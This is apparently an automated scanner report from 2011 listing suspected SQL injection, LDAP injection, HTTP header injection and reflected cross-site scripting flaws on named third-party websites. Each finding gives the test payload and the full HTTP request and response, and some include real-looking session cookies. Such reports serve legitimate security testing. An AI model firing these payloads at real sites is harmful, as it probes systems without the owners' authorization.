Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>404 Page Not Found</title>
<meta name="description" content="Why are we so dedicated to being a law firm &quot;different in kind&quot; from those you have encountered in the past? Because our goal is to be your trusted partner -- a partner you can rely on to solve your problems and enhance your business." />
<link rel="stylesheet" type="text/css" href="http://www.tuckerellis.com/css/interior.css" />
<link rel="stylesheet" media="print" type="text/css" href="http://www.tuckerellis.com/css/print.css" />
<link rel="shortcut icon" href="http://www.tuckerellis.com/tucker-favicon.ico" />
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/justcorners.js"></script>
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/functions.js"></script>

<script type="text/javascript">
if (document.layers) {var NN4 = true;}

if (document.all) {var IE = true;}

if (document.getElementById && !document.all) {var DOM = true;}

function getElement(id){
   if(NN4) {
       path = document.layers[id]
   } else if(IE) {
       path = document.all[id]
   } else {
       path = document.getElementById(id)
   }
   
   return path;
}
</script>
</head>

<body>

<div id="container">
<a href="http://www.tuckerellis.com/"><img src="http://www.tuckerellis.com/images/logo-sm.gif" border="0" alt="Tucker Ellis &amp; West" name="logo" width="344" height="47" id="logo" title="Tucker Ellis &amp; West" /></a>

<div id="navigation">

<div id="primary">
<script type="text/javascript">

var submenu = 'submenu0';
function NavOff() {
   getElement('submenu1').styl
...[SNIP]...

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 25991164%20or%201%3d1--%20 and 25991164%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico?125991164%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico?125991164%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Apr 2009 13:44:14 GMT
ETag: "787a4-57e-42776780"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

...[binary response body (icon image data, 1406 bytes) not reproducible as text]...

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The esvaid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8ad6dbc7bbe7c3c8)(sn=* and 8ad6dbc7bbe7c3c8)!(sn=* were each submitted in the esvaid parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)!(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)!(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)!(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e8e3%0d%0a4cbaf4bd3c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e8e3%0d%0a4cbaf4bd3c9;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e8e3
4cbaf4bd3c9
;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143:
Date: Thu, 12 May 2011 11:05:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the esvaid request parameter is copied into the Set-Cookie response header. The payload 62e27%0d%0a952543f233d was submitted in the esvaid parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=62e27%0d%0a952543f233d&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA62e27
952543f233d
=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA62e27
952543f233d=;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the esvcrea request parameter is copied into the Set-Cookie response header. The payload 26685%0d%0a292b8d9985f was submitted in the esvcrea parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=26685%0d%0a292b8d9985f&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE26685
292b8d9985f
_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload e513e%0d%0a4a7e0968d52 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=312253240&code=e513e%0d%0a4a7e0968d52 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:19 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-A76)M-0; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=2-312253240-&code=e513e
4a7e0968d52

Content-Length: 33
Content-Type: text/html

/* /adsc/d909615/2/-1/randm.js */

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 40cbd%0d%0a96c50092903 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=40cbd%0d%0a96c50092903&code=214693346 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:14 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-576)M-0; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=-1-40cbd
96c50092903
-&code=214693346
Content-Length: 44
Content-Type: text/html

/* /adsc/d909615/-1/200214693346/randm.js */

4. Cross-site scripting (reflected)
There are 191 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f79e7"><script>alert(1)</script>1553382093a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof79e7"><script>alert(1)</script>1553382093a HTTP/1.1
Host: 207.56.166.97
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:41:46 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/favicon.icof79e7"><script>alert(1)</script>1553382093a');" title="Email Page">
...[SNIP]...

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74711"><script>alert(1)</script>5c2b4746530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

